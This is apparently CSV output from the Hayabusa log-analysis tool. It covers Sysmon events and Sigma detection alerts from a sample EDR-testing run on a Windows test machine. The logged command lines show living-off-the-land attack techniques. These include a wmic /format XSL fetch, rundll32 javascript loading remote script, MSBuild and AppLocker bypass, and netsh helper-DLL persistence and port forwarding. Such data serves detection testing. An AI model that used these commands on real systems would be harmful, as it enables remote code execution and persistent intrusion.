2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 
06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 
